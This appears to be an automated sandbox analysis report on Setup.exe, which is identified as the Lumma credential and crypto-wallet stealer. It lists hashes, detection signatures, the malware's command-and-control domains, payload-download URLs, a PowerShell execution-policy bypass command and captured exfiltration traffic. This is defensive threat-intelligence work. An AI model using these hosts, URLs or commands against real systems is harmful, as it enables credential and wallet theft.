Edit tour

Windows Analysis Report
Setup.exe

Overview

General Information

Sample name:	Setup.exe
Analysis ID:	1580125
MD5:	79c238ebe5c951b14e9e4729ce73fcc9
SHA1:	87b1590ebd335e94594e654d1c78ce08067d9d1f
SHA256:	09c43883e99bf9db74a86431dec7827fa5e112afe0e7efe952f4f50be249c4a6
Tags:	exeuser-aachum
Infos:

Detection

LummaC

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Antivirus detection for URL or domain

Found malware configuration

Malicious sample detected (through community Yara rule)

Suricata IDS alerts for network traffic

Yara detected LummaC Stealer

AI detected suspicious sample

C2 URLs / IPs found in malware configuration

Found many strings related to Crypto-Wallets (likely being stolen)

Loading BitLocker PowerShell Module

LummaC encrypted strings found

Query firmware table information (likely to detect VMs)

Sigma detected: Suspicious PowerShell Parameter Substring

Tries to harvest and steal browser information (history, passwords, etc)

Tries to harvest and steal ftp login credentials

Tries to steal Crypto Currency Wallets

AV process strings found (often used to terminate AV products)

Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)

Contains functionality to call native functions

Contains functionality to read the PEB

Contains long sleeps (>= 3 min)

Detected potential crypto function

Enables debug privileges

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Found inlined nop instructions (likely shell or obfuscated code)

Found potential string decryption / allocating functions

Internet Provider seen in connection with other malware

JA3 SSL client fingerprint seen in connection with other malware

May sleep (evasive loops) to hinder dynamic analysis

Monitors certain registry keys / values for changes (often done to protect autostart functionality)

PE / OLE file has an invalid certificate

PE file contains executable resources (Code or Archives)

PE file contains more sections than normal

PE file contains sections with non-standard names

Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)

Queries the volume information (name, serial number etc) of a device

Sample file is different than original file name gathered from version info

Searches for user specific document files

Sigma detected: Change PowerShell Policies to an Insecure Level

Suricata IDS alerts with low severity for network traffic

Uses 32bit PE files

Uses a known web browser user agent for HTTP communication

Uses code obfuscation techniques (call, push, ret)

Yara detected Credential Stealer

Yara signature match

Classification

Process Tree

System is w10x64

Setup.exe (PID: 6596 cmdline: "C:\Users\user\Desktop\Setup.exe" MD5: 79C238EBE5C951B14E9E4729CE73FCC9)

powershell.exe (PID: 3720 cmdline: powershell -exec bypass error code: 523 MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)

conhost.exe (PID: 2084 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

cleanup

Malware Threat Intel

Provided by

Name	Description	Attribution	Blogpost URLs	Link
Lumma Stealer, LummaC2 Stealer	Lumma Stealer (aka LummaC2 Stealer) is an information stealer written in C language that has been available through a Malware-as-a-Service (MaaS) model on Russian-speaking forums since at least August 2022. It is believed to have been developed by the threat actor "Shamel", who goes by the alias "Lumma". Lumma Stealer primarily targets cryptocurrency wallets and two-factor authentication (2FA) browser extensions, before ultimately stealing sensitive information from the victim's machine. Once the targeted data is obtained, it is exfiltrated to a C2 server via HTTP POST requests using the user agent "TeslaBrowser/5.5"." The stealer also features a non-resident loader that is capable of delivering additional payloads via EXE, DLL, and PowerShell.	No Attribution	https://0xmrmagnezi.github.io/malware%20analysis/LummaStealer/ https://0xtoxin-labs.gitbook.io/malware-analysis/malware-analysis/lummac2-breakdown#chrome-extensions-crx https://any.run/cybersecurity-blog/crackedcantil-breakdown/ https://blog.cyble.com/2023/01/06/lummac2-stealer-a-potent-threat-to-crypto-users/ https://blog.sekoia.io/exposing-fakebat-loader-distribution-methods-and-adversary-infrastructure/	https://malpedia.caad.fkie.fraunhofer.de/details/win.lumma

Malware Configuration

Threatname: LummaC

{"C2 url": ["wordyfindy.lat", "beefshooti.click", "curverpluch.lat", "talkynicer.lat", "shapestickyr.lat", "bashfulacid.lat", "tentabatte.lat", "manyrestro.lat", "slipperyloo.lat"], "Build id": "jMw1IE--BARNI"}

Yara Signatures

PCAP (Network Traffic)

Source	Rule	Description	Author	Strings
sslproxydump.pcap	JoeSecurity_LummaCStealer_3	Yara detected LummaC Stealer	Joe Security
sslproxydump.pcap	JoeSecurity_LummaCStealer_2	Yara detected LummaC Stealer	Joe Security

Memory Dumps

Source	Rule	Description	Author	Strings
00000000.00000003.1903279526.000000000105D000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000000.00000003.1905498616.0000000001066000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000000.00000002.1997756045.0000000000F50000.00000040.00001000.00020000.00000000.sdmp	Windows_Trojan_Donutloader_f40e3759	unknown	unknown	0x49bc9:$x86: 04 75 EE 89 31 F0 FF 46 04 33 C0 EB
Process Memory Space: Setup.exe PID: 6596	JoeSecurity_LummaCStealer_3	Yara detected LummaC Stealer	Joe Security
Process Memory Space: Setup.exe PID: 6596	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: Setup.exe PID: 6596	JoeSecurity_LummaCStealer	Yara detected LummaC Stealer	Joe Security
Click to see the 1 entries

Sigma Signatures

System Summary

Sigma detected: Suspicious PowerShell Parameter Substring

Source: Process started

Author: Florian Roth (Nextron Systems), Daniel Bohannon (idea), Roberto Rodriguez (Fix): Data: Command: powershell -exec bypass error code: 523, CommandLine: powershell -exec bypass error code: 523, CommandLine|base64offset|contains: ^, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\Setup.exe", ParentImage: C:\Users\user\Desktop\Setup.exe, ParentProcessId: 6596, ParentProcessName: Setup.exe, ProcessCommandLine: powershell -exec bypass error code: 523, ProcessId: 3720, ProcessName: powershell.exe

Sigma detected: Change PowerShell Policies to an Insecure Level

Source: Process started

Author: frack113: Data: Command: powershell -exec bypass error code: 523, CommandLine: powershell -exec bypass error code: 523, CommandLine|base64offset|contains: ^, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\Setup.exe", ParentImage: C:\Users\user\Desktop\Setup.exe, ParentProcessId: 6596, ParentProcessName: Setup.exe, ProcessCommandLine: powershell -exec bypass error code: 523, ProcessId: 3720, ProcessName: powershell.exe

Sigma detected: Non Interactive PowerShell Process Spawned

Source: Process started

Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: powershell -exec bypass error code: 523, CommandLine: powershell -exec bypass error code: 523, CommandLine|base64offset|contains: ^, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\Setup.exe", ParentImage: C:\Users\user\Desktop\Setup.exe, ParentProcessId: 6596, ParentProcessName: Setup.exe, ProcessCommandLine: powershell -exec bypass error code: 523, ProcessId: 3720, ProcessName: powershell.exe

Suricata Signatures

ET JA3 Hash - Possible Malware - Fake Firefox Font Update

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-12-24T01:12:16.539512+0100	2028371	3	Unknown Traffic	192.168.2.4	49730	104.21.18.185	443	TCP
2024-12-24T01:12:18.574856+0100	2028371	3	Unknown Traffic	192.168.2.4	49731	104.21.18.185	443	TCP
2024-12-24T01:12:20.987785+0100	2028371	3	Unknown Traffic	192.168.2.4	49732	104.21.18.185	443	TCP
2024-12-24T01:12:23.709376+0100	2028371	3	Unknown Traffic	192.168.2.4	49734	104.21.18.185	443	TCP
2024-12-24T01:12:26.423291+0100	2028371	3	Unknown Traffic	192.168.2.4	49738	104.21.18.185	443	TCP
2024-12-24T01:12:29.474434+0100	2028371	3	Unknown Traffic	192.168.2.4	49740	104.21.18.185	443	TCP
2024-12-24T01:12:31.599207+0100	2028371	3	Unknown Traffic	192.168.2.4	49742	104.21.18.185	443	TCP
2024-12-24T01:12:33.567801+0100	2028371	3	Unknown Traffic	192.168.2.4	49743	104.21.18.185	443	TCP
2024-12-24T01:12:35.868046+0100	2028371	3	Unknown Traffic	192.168.2.4	49744	104.21.27.229	443	TCP

ET MALWARE Lumma Stealer CnC Host Checkin

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-12-24T01:12:17.295364+0100	2054653	1	A Network Trojan was detected	192.168.2.4	49730	104.21.18.185	443	TCP
2024-12-24T01:12:19.337254+0100	2054653	1	A Network Trojan was detected	192.168.2.4	49731	104.21.18.185	443	TCP
2024-12-24T01:12:34.346561+0100	2054653	1	A Network Trojan was detected	192.168.2.4	49743	104.21.18.185	443	TCP

ET MALWARE Lumma Stealer Related Activity

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-12-24T01:12:17.295364+0100	2049836	1	A Network Trojan was detected	192.168.2.4	49730	104.21.18.185	443	TCP

ET MALWARE Lumma Stealer Related Activity M2

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-12-24T01:12:19.337254+0100	2049812	1	A Network Trojan was detected	192.168.2.4	49731	104.21.18.185	443	TCP

ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-12-24T01:12:22.279186+0100	2048094	1	Malware Command and Control Activity Detected	192.168.2.4	49732	104.21.18.185	443	TCP

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Antivirus detection for URL or domain

Source: https://klipcatepiu0.shop:443/int_clp_ldr_sha.txt	Avira URL Cloud: Label: malware
Source: https://klipcatepiu0.shop/int_clp_ldr_sha.txt	Avira URL Cloud: Label: malware
Source: https://klipcatepiu0.shop/int_clp_ldr_sha.txtDZ	Avira URL Cloud: Label: malware
Source: https://neqi.shop/sdgjyut/psh.txt	Avira URL Cloud: Label: malware
Source: https://klipcatepiu0.shop/	Avira URL Cloud: Label: malware
Source: https://klipcatepiu0.shop/hB	Avira URL Cloud: Label: malware
Source: https://neqi.shop/sdgjyut/psh.txtM	Avira URL Cloud: Label: malware
Source: https://neqi.shop:443/sdgjyut/psh.txt	Avira URL Cloud: Label: malware
Source: https://klipcatepiu0.shop/int_clp_ldr_sha.txtS	Avira URL Cloud: Label: malware
Source: https://neqi.shop/sdgjyut/psh.txtf5	Avira URL Cloud: Label: malware

Found malware configuration

Source: Setup.exe.6596.0.memstrmin

Malware Configuration Extractor: LummaC {"C2 url": ["wordyfindy.lat", "beefshooti.click", "curverpluch.lat", "talkynicer.lat", "shapestickyr.lat", "bashfulacid.lat", "tentabatte.lat", "manyrestro.lat", "slipperyloo.lat"], "Build id": "jMw1IE--BARNI"}

AI detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 99.6% probability

Source: Setup.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: unknown	HTTPS traffic detected: 104.21.18.185:443 -> 192.168.2.4:49730 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.18.185:443 -> 192.168.2.4:49731 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.18.185:443 -> 192.168.2.4:49732 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.18.185:443 -> 192.168.2.4:49734 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.18.185:443 -> 192.168.2.4:49738 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.18.185:443 -> 192.168.2.4:49740 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.18.185:443 -> 192.168.2.4:49742 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.18.185:443 -> 192.168.2.4:49743 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.27.229:443 -> 192.168.2.4:49744 version: TLS 1.2

Source: Setup.exe

Static PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE

Source:

Binary string: System.Management.Automation.pdb source: powershell.exe, 00000004.00000002.2026381820.0000000006D1A000.00000004.00000020.00020000.00000000.sdmp

Source: C:\Users\user\Desktop\Setup.exe	Code function: 4x nop then mov esi, edx	0_2_00F5A0FC
Source: C:\Users\user\Desktop\Setup.exe	Code function: 4x nop then mov word ptr [eax], cx	0_2_00F6E0DC
Source: C:\Users\user\Desktop\Setup.exe	Code function: 4x nop then movzx esi, byte ptr [esp+eax-7Dh]	0_2_00F6E0DC
Source: C:\Users\user\Desktop\Setup.exe	Code function: 4x nop then movzx ecx, byte ptr [esp+edi+2845CE35h]	0_2_00F69090
Source: C:\Users\user\Desktop\Setup.exe	Code function: 4x nop then cmp dword ptr [edi+edx*8], 73B6CFD8h	0_2_00F69090
Source: C:\Users\user\Desktop\Setup.exe	Code function: 4x nop then mov byte ptr [edx], bl	0_2_00F7C057
Source: C:\Users\user\Desktop\Setup.exe	Code function: 4x nop then mov ecx, eax	0_2_00F74048
Source: C:\Users\user\Desktop\Setup.exe	Code function: 4x nop then mov eax, ecx	0_2_00F68033
Source: C:\Users\user\Desktop\Setup.exe	Code function: 4x nop then movzx edi, byte ptr [esp+ecx+1Ch]	0_2_00F7300C
Source: C:\Users\user\Desktop\Setup.exe	Code function: 4x nop then jmp eax	0_2_00F7A1BA
Source: C:\Users\user\Desktop\Setup.exe	Code function: 4x nop then mov ebx, dword ptr [edi+04h]	0_2_00F7B17C
Source: C:\Users\user\Desktop\Setup.exe	Code function: 4x nop then cmp dword ptr [esi+edx*8], 73004FCFh	0_2_00F6B12C
Source: C:\Users\user\Desktop\Setup.exe	Code function: 4x nop then movzx esi, byte ptr [esp+ecx-000000ABh]	0_2_00F6B12C
Source: C:\Users\user\Desktop\Setup.exe	Code function: 4x nop then cmp dword ptr [edi+esi*8], D6A985C1h	0_2_00F6B12C
Source: C:\Users\user\Desktop\Setup.exe	Code function: 4x nop then movzx ebx, byte ptr [esp+esi+2845CDC9h]	0_2_00F6B12C
Source: C:\Users\user\Desktop\Setup.exe	Code function: 4x nop then cmp dword ptr [esi+edx*8], 5E874B5Fh	0_2_00F6B12C
Source: C:\Users\user\Desktop\Setup.exe	Code function: 4x nop then cmp dword ptr [edi+esi*8], 5E874B5Fh	0_2_00F6B12C
Source: C:\Users\user\Desktop\Setup.exe	Code function: 4x nop then cmp dword ptr [ebx+edi*8], 888A0AE0h	0_2_00F6B12C
Source: C:\Users\user\Desktop\Setup.exe	Code function: 4x nop then cmp dword ptr [ebx+edi*8], D6A985C1h	0_2_00F6B12C
Source: C:\Users\user\Desktop\Setup.exe	Code function: 4x nop then movzx ebx, byte ptr [eax+edx]	0_2_00F702EC
Source: C:\Users\user\Desktop\Setup.exe	Code function: 4x nop then mov edi, eax	0_2_00F8C2C5
Source: C:\Users\user\Desktop\Setup.exe	Code function: 4x nop then mov byte ptr [esi], cl	0_2_00F7C284
Source: C:\Users\user\Desktop\Setup.exe	Code function: 4x nop then mov edx, ecx	0_2_00F8D24C
Source: C:\Users\user\Desktop\Setup.exe	Code function: 4x nop then movzx ecx, cx	0_2_00F7E24B
Source: C:\Users\user\Desktop\Setup.exe	Code function: 4x nop then movzx ecx, word ptr [esi+eax]	0_2_00F733FC
Source: C:\Users\user\Desktop\Setup.exe	Code function: 4x nop then movzx eax, byte ptr [esp+ebx+02h]	0_2_00F773EC
Source: C:\Users\user\Desktop\Setup.exe	Code function: 4x nop then mov byte ptr [ebx], al	0_2_00F7D3D1
Source: C:\Users\user\Desktop\Setup.exe	Code function: 4x nop then mov byte ptr [ebx], al	0_2_00F7D3D1
Source: C:\Users\user\Desktop\Setup.exe	Code function: 4x nop then mov dword ptr [esp], edx	0_2_00F7D3D1
Source: C:\Users\user\Desktop\Setup.exe	Code function: 4x nop then cmp dword ptr [esi+edx*8], FAD59DE2h	0_2_00F683A2
Source: C:\Users\user\Desktop\Setup.exe	Code function: 4x nop then movzx esi, byte ptr [esp+eax+05h]	0_2_00F7939C
Source: C:\Users\user\Desktop\Setup.exe	Code function: 4x nop then cmp word ptr [edi+ebx+02h], 0000h	0_2_00F8D4FC
Source: C:\Users\user\Desktop\Setup.exe	Code function: 4x nop then cmp byte ptr [esi+ebx], 00000000h	0_2_00F7B47C
Source: C:\Users\user\Desktop\Setup.exe	Code function: 4x nop then cmp word ptr [edi+eax+02h], 0000h	0_2_00F79554
Source: C:\Users\user\Desktop\Setup.exe	Code function: 4x nop then cmp word ptr [ecx+eax+02h], 0000h	0_2_00F6753E
Source: C:\Users\user\Desktop\Setup.exe	Code function: 4x nop then cmp dword ptr [esi+edx*8], 29FCC5D8h	0_2_00F68698
Source: C:\Users\user\Desktop\Setup.exe	Code function: 4x nop then movzx esi, byte ptr [esp+eax+02h]	0_2_00F5A64C
Source: C:\Users\user\Desktop\Setup.exe	Code function: 4x nop then mov byte ptr [eax], cl	0_2_00F5A64C
Source: C:\Users\user\Desktop\Setup.exe	Code function: 4x nop then mov byte ptr [ecx], al	0_2_00F5E638
Source: C:\Users\user\Desktop\Setup.exe	Code function: 4x nop then mov edi, ecx	0_2_00F5E638
Source: C:\Users\user\Desktop\Setup.exe	Code function: 4x nop then movzx ecx, byte ptr [esp+eax+1Ch]	0_2_00F7A60C
Source: C:\Users\user\Desktop\Setup.exe	Code function: 4x nop then cmp dword ptr [edi+esi*8], 3FE33C50h	0_2_00F687EC
Source: C:\Users\user\Desktop\Setup.exe	Code function: 4x nop then cmp dword ptr [edx+ebp*8], C72EB52Eh	0_2_00F8A79C
Source: C:\Users\user\Desktop\Setup.exe	Code function: 4x nop then movsx ecx, byte ptr [esi]	0_2_00F8C74C
Source: C:\Users\user\Desktop\Setup.exe	Code function: 4x nop then lea esi, dword ptr [esp+00000098h]	0_2_00F68748
Source: C:\Users\user\Desktop\Setup.exe	Code function: 4x nop then mov word ptr [eax], cx	0_2_00F688DE
Source: C:\Users\user\Desktop\Setup.exe	Code function: 4x nop then movzx eax, byte ptr [esp+ecx-000000A8h]	0_2_00F8884F
Source: C:\Users\user\Desktop\Setup.exe	Code function: 4x nop then movzx edx, byte ptr [esp+eax+28h]	0_2_00F7782C
Source: C:\Users\user\Desktop\Setup.exe	Code function: 4x nop then movzx ecx, byte ptr [esp+eax]	0_2_00F7482C
Source: C:\Users\user\Desktop\Setup.exe	Code function: 4x nop then movzx edx, byte ptr [esp+eax]	0_2_00F7482C
Source: C:\Users\user\Desktop\Setup.exe	Code function: 4x nop then movzx edi, byte ptr [esp+eax+4A96EB48h]	0_2_00F8E97C
Source: C:\Users\user\Desktop\Setup.exe	Code function: 4x nop then lea eax, dword ptr [eax+eax*4]	0_2_00F5992C
Source: C:\Users\user\Desktop\Setup.exe	Code function: 4x nop then cmp cl, 0000002Eh	0_2_00F77A9B
Source: C:\Users\user\Desktop\Setup.exe	Code function: 4x nop then movzx ebx, byte ptr [edx]	0_2_00F84A6C
Source: C:\Users\user\Desktop\Setup.exe	Code function: 4x nop then mov word ptr [eax], dx	0_2_00F66A5E
Source: C:\Users\user\Desktop\Setup.exe	Code function: 4x nop then movzx edi, byte ptr [esp+edx+06h]	0_2_00F79BE9
Source: C:\Users\user\Desktop\Setup.exe	Code function: 4x nop then mov word ptr [eax], cx	0_2_00F79BE9
Source: C:\Users\user\Desktop\Setup.exe	Code function: 4x nop then mov word ptr [eax], cx	0_2_00F79BE9
Source: C:\Users\user\Desktop\Setup.exe	Code function: 4x nop then mov ebx, dword ptr [esp]	0_2_00F79B60
Source: C:\Users\user\Desktop\Setup.exe	Code function: 4x nop then movzx edi, byte ptr [esp+eax+4A96EB48h]	0_2_00F8EB0C
Source: C:\Users\user\Desktop\Setup.exe	Code function: 4x nop then movzx ecx, byte ptr [esp+edi+2845CE35h]	0_2_00F68CEB
Source: C:\Users\user\Desktop\Setup.exe	Code function: 4x nop then cmp dword ptr [edi+edx*8], 73B6CFD8h	0_2_00F68CEB
Source: C:\Users\user\Desktop\Setup.exe	Code function: 4x nop then mov word ptr [edi], ax	0_2_00F8BCE6
Source: C:\Users\user\Desktop\Setup.exe	Code function: 4x nop then movzx edi, byte ptr [esp+ecx-7994E9ADh]	0_2_00F7BCDC
Source: C:\Users\user\Desktop\Setup.exe	Code function: 4x nop then add eax, dword ptr [esp+ecx*4+24h]	0_2_00F58C6C
Source: C:\Users\user\Desktop\Setup.exe	Code function: 4x nop then movzx ecx, word ptr [ebp+edi*4+00h]	0_2_00F58C6C
Source: C:\Users\user\Desktop\Setup.exe	Code function: 4x nop then mov word ptr [edi], ax	0_2_00F76C6A
Source: C:\Users\user\Desktop\Setup.exe	Code function: 4x nop then cmp byte ptr [eax+ecx+23h], 00000000h	0_2_00F5BC1F
Source: C:\Users\user\Desktop\Setup.exe	Code function: 4x nop then mov edx, ecx	0_2_00F87DEC
Source: C:\Users\user\Desktop\Setup.exe	Code function: 4x nop then test eax, eax	0_2_00F87DEC
Source: C:\Users\user\Desktop\Setup.exe	Code function: 4x nop then cmp al, 5Ch	0_2_00F53DDC
Source: C:\Users\user\Desktop\Setup.exe	Code function: 4x nop then mov word ptr [edi], cx	0_2_00F6DD5A
Source: C:\Users\user\Desktop\Setup.exe	Code function: 4x nop then mov byte ptr [eax], cl	0_2_00F77D17
Source: C:\Users\user\Desktop\Setup.exe	Code function: 4x nop then movzx ecx, byte ptr [esp+eax+74h]	0_2_00F5AD0C
Source: C:\Users\user\Desktop\Setup.exe	Code function: 4x nop then mov word ptr [edi], ax	0_2_00F5AD0C
Source: C:\Users\user\Desktop\Setup.exe	Code function: 4x nop then lea eax, dword ptr [esi+20h]	0_2_00F5CE7F
Source: C:\Users\user\Desktop\Setup.exe	Code function: 4x nop then lea eax, dword ptr [esi+20h]	0_2_00F5CE7F
Source: C:\Users\user\Desktop\Setup.exe	Code function: 4x nop then push eax	0_2_00F5CFFA
Source: C:\Users\user\Desktop\Setup.exe	Code function: 4x nop then movzx ecx, byte ptr [esp+eax]	0_2_00F89FEC
Source: C:\Users\user\Desktop\Setup.exe	Code function: 4x nop then cmp dword ptr [ebx+edi*8], E1A2961Bh	0_2_00F8BF70
Source: C:\Users\user\Desktop\Setup.exe	Code function: 4x nop then mov byte ptr [esi], cl	0_2_00F7DF2C
Source: C:\Users\user\Desktop\Setup.exe	Code function: 4x nop then movzx edi, byte ptr [esp+ecx-0CB4AF98h]	0_2_00F7DF2C

Networking

Suricata IDS alerts for network traffic

Source: Network traffic	Suricata IDS: 2048094 - Severity 1 - ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration : 192.168.2.4:49732 -> 104.21.18.185:443
Source: Network traffic	Suricata IDS: 2049812 - Severity 1 - ET MALWARE Lumma Stealer Related Activity M2 : 192.168.2.4:49731 -> 104.21.18.185:443
Source: Network traffic	Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.4:49731 -> 104.21.18.185:443
Source: Network traffic	Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.4:49743 -> 104.21.18.185:443
Source: Network traffic	Suricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.4:49730 -> 104.21.18.185:443
Source: Network traffic	Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.4:49730 -> 104.21.18.185:443

C2 URLs / IPs found in malware configuration

Source: Malware configuration extractor	URLs: wordyfindy.lat
Source: Malware configuration extractor	URLs: beefshooti.click
Source: Malware configuration extractor	URLs: curverpluch.lat
Source: Malware configuration extractor	URLs: talkynicer.lat
Source: Malware configuration extractor	URLs: shapestickyr.lat
Source: Malware configuration extractor	URLs: bashfulacid.lat
Source: Malware configuration extractor	URLs: tentabatte.lat
Source: Malware configuration extractor	URLs: manyrestro.lat
Source: Malware configuration extractor	URLs: slipperyloo.lat

Source: Joe Sandbox View

ASN Name: CLOUDFLARENETUS CLOUDFLARENETUS

Source: Joe Sandbox View

JA3 fingerprint: a0e9f5d64349fb13191bc781f81f42e1

Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49730 -> 104.21.18.185:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49743 -> 104.21.18.185:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49734 -> 104.21.18.185:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49731 -> 104.21.18.185:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49738 -> 104.21.18.185:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49740 -> 104.21.18.185:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49732 -> 104.21.18.185:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49742 -> 104.21.18.185:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49744 -> 104.21.27.229:443

Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: beefshooti.click
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 79Host: beefshooti.click
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=GBWXKW47DFUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 18115Host: beefshooti.click
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=H7H31ZUGFVXUUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8748Host: beefshooti.click
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=B5HRORPDBHHCUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 20401Host: beefshooti.click
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=2M7NPPXJMWSGOFUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 1231Host: beefshooti.click
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=O72ZSG6XGUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 1064Host: beefshooti.click
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 114Host: beefshooti.click
Source: global traffic	HTTP traffic detected: GET /sdgjyut/psh.txt HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Host: neqi.shop

Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: global traffic

HTTP traffic detected: GET /sdgjyut/psh.txt HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Host: neqi.shop

Source: global traffic	DNS traffic detected: DNS query: beefshooti.click
Source: global traffic	DNS traffic detected: DNS query: neqi.shop
Source: global traffic	DNS traffic detected: DNS query: klipcatepiu0.shop

Source: unknown

